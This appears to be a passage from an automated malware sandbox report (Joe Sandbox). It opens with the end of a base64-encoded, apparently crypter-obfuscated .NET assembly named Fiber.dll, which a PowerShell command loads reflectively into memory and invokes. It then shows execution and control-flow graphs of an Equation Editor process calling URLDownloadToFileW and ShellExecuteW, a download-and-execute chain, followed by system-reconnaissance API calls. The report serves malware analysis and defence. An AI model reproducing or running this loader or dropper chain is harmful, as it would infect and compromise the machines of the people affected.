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');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] (' ??v?}???@+@ ?@@ ??v?}??.fgjk4*?*?#:?yy ??v?}??4*?*?#:?yaa.4*?*?#:?g ??v?}??.8*??(8*??(lilag ??v?}??8*??(jorp4*?*?#:?4*?*?#:??? }??+?sp ??v?}?? ??v?}???*(??@*?','1No1me_Startup','2No3me_3tartup'))
                  Imagebase:0x21bc0000
                  File size:452608 bytes
                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  Reset < >

                    Execution Graph

                    Execution Coverage:53.3%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:74.5%
                    Total number of Nodes:47
                    Total number of Limit Nodes:6
                    execution_graph 185 398602e LoadLibraryW 200 3986056 185->200 188 39860b8 URLDownloadToFileW 189 39860c2 188->189 214 39860d2 188->214 223 39860e7 189->223 194 39860e1 ShellExecuteW 229 398610c 194->229 197 3986146 198 3986100 198->197 199 398610f ExitProcess 198->199 201 3986059 200->201 202 39860b9 8 API calls 201->202 203 3986067 URLDownloadToFileW 201->203 202->203 205 39860c2 203->205 206 39860d2 5 API calls 203->206 207 39860e7 3 API calls 205->207 206->205 208 39860d9 207->208 209 39860e1 ShellExecuteW 208->209 211 3986043 208->211 210 398610c ExitProcess 209->210 212 3986100 210->212 211->188 231 39860b9 URLDownloadToFileW 211->231 212->211 213 398610f ExitProcess 212->213 215 39860d4 214->215 216 39860d9 215->216 217 39860e7 3 API calls 215->217 218 39860e1 ShellExecuteW 216->218 220 3986146 216->220 217->216 219 398610c ExitProcess 218->219 221 3986100 219->221 220->189 221->220 222 398610f ExitProcess 221->222 224 39860ea ShellExecuteW 223->224 225 398610c ExitProcess 224->225 226 3986100 224->226 225->226 227 39860d9 226->227 228 398610f ExitProcess 226->228 227->194 227->197 230 398610f ExitProcess 229->230 232 39860d2 5 API calls 231->232 233 39860c2 232->233 234 39860e7 3 API calls 233->234 235 39860d9 234->235 236 39860e1 ShellExecuteW 235->236 238 3986067 235->238 237 398610c ExitProcess 236->237 239 3986100 237->239 238->188 239->238 240 398610f ExitProcess 239->240

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
                    callgraph 0 Function_039860B9 2 Function_0398610C 0->2 5 Function_039860D2 0->5 7 Function_039860E7 0->7 1 Function_0398613B 3 Function_0398618C 4 Function_0398602E 4->0 4->2 4->5 6 Function_03986056 4->6 4->7 5->2 5->7 6->0 6->2 6->5 6->7 7->2

                    Control-flow Graph

                    APIs
                    • LoadLibraryW.KERNEL32 ref: 0398603C
                    • URLDownloadToFileW.URLMON(00000000,03986067,?,00000000,00000000), ref: 039860BB
                    • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 039860F9
                    • ExitProcess.KERNEL32(00000000,?,03986100), ref: 03986111
                    Memory Dump Source
                    • Source File: 00000003.00000002.1087297770.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3610000_EQNEDT32.jbxd
                    Similarity
                    • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                    • String ID:
                    • API String ID: 2508257586-0
                    • Opcode ID: ac20071483e2e4a089b929633cfc591e0546a7cf1ed7d5e897122a586ea75b7b
                    • Instruction ID: d75059f39ac2492c7e40a77d132c0df7829d1850b01f5dbbab75b882580a86e0
                    • Opcode Fuzzy Hash: ac20071483e2e4a089b929633cfc591e0546a7cf1ed7d5e897122a586ea75b7b
                    • Instruction Fuzzy Hash: 1E31695550C3C16FDB22EB304D6AB66BF696B93204F0CCACED6854E093D7549105C76A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 42 39860b9-39860df URLDownloadToFileW call 39860d2 call 39860e7 48 39860e1-3986103 ShellExecuteW call 398610c 42->48 49 3986146-3986152 42->49 51 3986155 48->51 61 3986105 48->61 49->51 52 398615d-3986161 51->52 53 3986157-398615b 51->53 56 3986163-3986167 52->56 57 3986176-3986178 52->57 53->52 55 3986169-3986170 53->55 59 3986172 55->59 60 3986174 55->60 56->55 56->57 62 3986188-3986189 57->62 59->57 63 398617a-3986183 60->63 61->57 64 3986107-3986111 ExitProcess 61->64 67 398614c-398614f 63->67 68 3986185 63->68 67->63 69 3986151 67->69 68->62 69->51
                    APIs
                    • URLDownloadToFileW.URLMON(00000000,03986067,?,00000000,00000000), ref: 039860BB
                      • Part of subcall function 039860D2: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 039860F9
                      • Part of subcall function 039860D2: ExitProcess.KERNEL32(00000000,?,03986100), ref: 03986111
                    Memory Dump Source
                    • Source File: 00000003.00000002.1087297770.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3610000_EQNEDT32.jbxd
                    Similarity
                    • API ID: DownloadExecuteExitFileProcessShell
                    • String ID:
                    • API String ID: 3584569557-0
                    • Opcode ID: 1df214bee716b96eaa6968b6f5540d55c6cd68628a7b695f28ef3691da5ac5df
                    • Instruction ID: d67f3689511332829775cc7654988b9de8ddbeefe8f46f3688ee1ada342de297
                    • Opcode Fuzzy Hash: 1df214bee716b96eaa6968b6f5540d55c6cd68628a7b695f28ef3691da5ac5df
                    • Instruction Fuzzy Hash: 69F0A09564C34539EA62FB750C8EF6B6E69AFC2B04F540889F3D18E0D3DA948804862A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 71 39860e7-39860f9 ShellExecuteW 73 3986100-3986103 71->73 74 39860fb call 398610c 71->74 76 3986155 73->76 77 3986105 73->77 74->73 78 398615d-3986161 76->78 79 3986157-398615b 76->79 80 3986176-3986178 77->80 81 3986107-3986111 ExitProcess 77->81 78->80 83 3986163-3986167 78->83 79->78 82 3986169-3986170 79->82 84 3986188-3986189 80->84 86 3986172 82->86 87 3986174 82->87 83->80 83->82 86->80 88 398617a-3986183 87->88 91 398614c-398614f 88->91 92 3986185 88->92 91->88 93 3986151 91->93 92->84 93->76
                    APIs
                    • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 039860F9
                      • Part of subcall function 0398610C: ExitProcess.KERNEL32(00000000,?,03986100), ref: 03986111
                    Memory Dump Source
                    • Source File: 00000003.00000002.1087297770.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3610000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExecuteExitProcessShell
                    • String ID:
                    • API String ID: 1124553745-0
                    • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                    • Instruction ID: b684cbf4d5a9b1241b435b8a331ccff327d1587ef12ca75b7d5dfa5f0d38f401
                    • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                    • Instruction Fuzzy Hash: C401D199A4834321DB70F7688C45BA7AB39ABC2740FCC8946EBD24C08BD59490C3865A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 94 39860d2-39860d4 96 39860d9-39860df 94->96 97 39860d4 call 39860e7 94->97 98 39860e1-3986103 ShellExecuteW call 398610c 96->98 99 3986146-3986152 96->99 97->96 101 3986155 98->101 111 3986105 98->111 99->101 102 398615d-3986161 101->102 103 3986157-398615b 101->103 106 3986163-3986167 102->106 107 3986176-3986178 102->107 103->102 105 3986169-3986170 103->105 109 3986172 105->109 110 3986174 105->110 106->105 106->107 112 3986188-3986189 107->112 109->107 113 398617a-3986183 110->113 111->107 114 3986107-3986111 ExitProcess 111->114 117 398614c-398614f 113->117 118 3986185 113->118 117->113 119 3986151 117->119 118->112 119->101
                    Memory Dump Source
                    • Source File: 00000003.00000002.1087297770.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3610000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExecuteExitProcessShell
                    • String ID:
                    • API String ID: 1124553745-0
                    • Opcode ID: 44608452cc0fe4775c69b6031ee34fbb171d552e4e7b263823cb43882b5357a0
                    • Instruction ID: 95130aeebb94583a3a27624a13994dc7ede6fbf1acf604975f25897d149d603d
                    • Opcode Fuzzy Hash: 44608452cc0fe4775c69b6031ee34fbb171d552e4e7b263823cb43882b5357a0
                    • Instruction Fuzzy Hash: BF01492464830631E760F7244C88FABAAA99BC2744F98885AE3D14C08BC2548443861D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 121 398610c-3986111 ExitProcess
                    APIs
                    • ExitProcess.KERNEL32(00000000,?,03986100), ref: 03986111
                    Memory Dump Source
                    • Source File: 00000003.00000002.1087297770.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3610000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                    • Instruction ID: 37effb242bddb16633805ab70bcb994f9fc1ef55730b22e5b6f2d90d27fe8903
                    • Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                    • Instruction Fuzzy Hash: 20D017713016029FD204EB54CD80F27F76AFFD4751F14D268E6054F65ADB34E891CAA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:10.5%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:12.2%
                    Total number of Nodes:139
                    Total number of Limit Nodes:10
                    execution_graph 1767 2730f76 1768 2730f9c GetDriveTypeW 1767->1768 1770 2730fb8 1768->1770 1912 1cab2cc 1914 1cab2ee NtQuerySystemInformation 1912->1914 1915 1cab338 1914->1915 1771 1caaa42 1772 1caaa6b GetConsoleOutputCP 1771->1772 1773 1caaa94 1771->1773 1774 1caaa80 1772->1774 1773->1772 1779 2731266 1780 2731295 SetConsoleTextAttribute 1779->1780 1781 27312d4 1779->1781 1782 27312a3 1780->1782 1781->1780 1868 2730464 1869 27304b2 SHGetFolderPathW 1868->1869 1871 2730510 1869->1871 1795 273096a 1796 2730996 GetSystemInfo 1795->1796 1797 27309bf 1795->1797 1798 27309ab 1796->1798 1797->1796 1884 27312ea 1886 2731316 WriteConsoleW 1884->1886 1887 2731364 1886->1887 1948 27305e8 1949 273060e UnmapViewOfFile 1948->1949 1951 273064f 1949->1951 1952 2730fee 1953 273104e GetVolumeInformationW 1952->1953 1955 27310a6 1953->1955 1807 1caa36a 1808 1caa3bf 1807->1808 1809 1caa396 SetErrorMode 1807->1809 1808->1809 1810 1caa3ab 1809->1810 1814 1cab2ee 1815 1cab323 NtQuerySystemInformation 1814->1815 1817 1cab34e 1814->1817 1816 1cab338 1815->1816 1817->1815 1818 1caacee 1821 1caad1d AdjustTokenPrivileges 1818->1821 1820 1caad3f 1821->1820 1872 2730854 1873 2730886 ReadFile 1872->1873 1875 27308ed 1873->1875 1888 27310d4 1889 27310ea SetThreadUILanguage 1888->1889 1891 2731157 1889->1891 1838 1caa8fa 1839 1caa94a VerLanguageNameW 1838->1839 1840 1caa958 1839->1840 1841 1cabafa 1842 1cabb29 GetConsoleScreenBufferInfo 1841->1842 1843 1cabb68 1841->1843 1844 1cabb37 1842->1844 1843->1842 1876 2731244 1877 2731266 SetConsoleTextAttribute 1876->1877 1879 27312a3 1877->1879 1857 273104e 1858 273109e GetVolumeInformationW 1857->1858 1859 27310a6 1858->1859 1892 1caa974 1893 1caa996 CloseHandle 1892->1893 1895 1caa9d0 1893->1895 1896 1caab75 1898 1caab9a GetLogicalDrives 1896->1898 1899 1caabd1 1898->1899 1916 273014c 1919 273016a SetConsoleTitleW 1916->1919 1918 27301d8 1919->1918 1920 2730d32 1922 2730d66 RegisterEventSourceW 1920->1922 1923 2730dde 1922->1923 1956 1caaa0f 1957 1caaa42 GetConsoleOutputCP 1956->1957 1959 1caaa80 1957->1959 1924 2730f34 1925 2730f41 GetDriveTypeW 1924->1925 1927 2730fb8 1925->1927 1775 1caab9a 1776 1caabc3 GetLogicalDrives 1775->1776 1777 1caabf9 1775->1777 1778 1caabd1 1776->1778 1777->1776 1900 1cabd1e 1901 1cabd52 GetTokenInformation 1900->1901 1903 1cabdc4 1901->1903 1960 1cab01d 1962 1cab02a K32GetModuleInformation 1960->1962 1963 1cab0b6 1962->1963 1964 1caba10 1966 1caba32 CreateFileW 1964->1966 1967 1caba86 1966->1967 1799 1caa996 1800 1caa9c2 CloseHandle 1799->1800 1801 1caaa01 1799->1801 1802 1caa9d0 1800->1802 1801->1800 1928 273092f 1929 273096a GetSystemInfo 1928->1929 1931 27309ab 1929->1931 1932 1caaaab 1934 1caaad2 LookupPrivilegeValueW 1932->1934 1935 1caab22 